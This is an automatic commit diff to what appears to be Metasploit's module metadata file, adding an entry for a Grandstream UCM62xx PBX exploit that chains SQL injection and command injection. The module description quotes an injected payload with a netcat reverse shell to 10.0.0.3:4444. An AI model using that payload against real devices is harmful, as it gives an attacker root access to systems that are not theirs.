automatic module_metadata_base.json update

2022-01-24 21:22:53 -06:00 · 2022-01-24 21:22:53 -06:00 · 6164fd9c62
parent 44f040ad78
commit 6164fd9c62
1 changed files with 61 additions and 0 deletions
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@ -60471,6 +60471,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/grandstream_ucm62xx_sendemail_rce": {
+    "name": "Grandstream UCM62xx IP PBX sendPasswordEmail RCE",
+    "fullname": "exploit/linux/http/grandstream_ucm62xx_sendemail_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-23",
+    "type": "exploit",
+    "author": [
+      "jbaines-r7"
+    ],
+    "description": "This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n          a command injection vulnerability (technically, no assigned CVE but was inadvertently\n          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n          series of devices. The vulnerabilities allow an unauthenticated remote attacker to\n          execute commands as root.\n\n          Exploitation happens in two stages:\n\n          1. An SQL injection during username lookup while executing the \"Forgot Password\" function.\n          2. A command injection that occurs after the user provided username is passed to a Python script\n          via the shell. Like so:\n\n          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n          This module affect UCM62xx versions before firmware version 1.0.19.20.",
+    "references": [
+      "CVE-2020-5722",
+      "EDB-48247"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 8089,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-01-24 21:01:34 +0000",
+    "path": "/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/grandstream_ucm62xx_sendemail_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/gravcms_exec": {
    "name": "GravCMS Remote Command Execution",
    "fullname": "exploit/linux/http/gravcms_exec",